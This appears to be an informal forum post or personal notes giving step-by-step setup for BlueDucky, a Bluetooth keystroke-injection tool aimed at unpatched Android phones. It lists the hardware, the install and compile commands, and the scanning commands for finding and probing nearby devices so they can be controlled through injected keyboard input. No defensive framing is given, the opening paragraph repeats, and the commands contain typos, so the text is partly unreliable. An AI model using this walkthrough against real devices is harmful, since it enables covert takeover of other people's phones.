I haven't used it yet but thank you in advance here's a dirty guide to getting things started when it comes to installation
don't change ownership of any tools or programs to try to bypass errors when messing with this
Notes: This is a bluetooth attack that was shown to us by david bombal and his friend who had an external bluetooth adapter connected to his
laptop and was using it to manipulate android devices that are os version 10 and below and pass commands ota through a bluetooth vulnerability.
External bluetooth adapters used are:
cambridge silicon radio, ltd csr8510a10 8891 panda asin: B00DJ83070
I haven't used it yet but thank you in advance here's a dirty guide to getting things started when it comes to installation
don't change ownership of any tools or programs to try to bypass errors when messing with this
Notes: This is a bluetooth attack that was shown to us by david bombal and his friend who had an external bluetooth adapter connected to his laptop and was using it to manipulate android devices that are os version 10 and below and pass commands ota through a bluetooth vulnerability.
External bluetooth adapters used are:
cambridge silicon radio, ltd csr8510a10 8891 panda asin: B00DJ83070
Needed libraries
git clone github.com/pybluez/pybluez.git
sudo pyhton3 setup.py install
sudo apt-get install bluez-tools bluez-hcidump libbluetooth-dev git gcc pyhton3-pip pyhton3-setuptools python3-pydbus
git clone --depth=1 github.com/bluez/bluez.git
cd bluez
sudo gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin
git clone github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
Notes: BlueDucky defaults in the python script to hci0 and if we are using an external adapter it would default to hci1
on line 632
sudo chmod 755 BlueDucky.py
sudo python3 BlueDucky.py
sudo hciconfig hci0 up
ls usb cambridge silicon radio bluetooth dongle in hci mode
sudo hcitool scan
shows us device names and mac addresses with bluetooth enabled
sudo sdptool browse [mac]
shows us more information on the bluetooth device transmitting...
hid human interface device if I can connect to the device and inject commands as a keyboard then I can control the device through input
Anything unpatched is vulnerable 11 + and anything 10 and below remains vulnerable
There's also scripts for linux mac and windows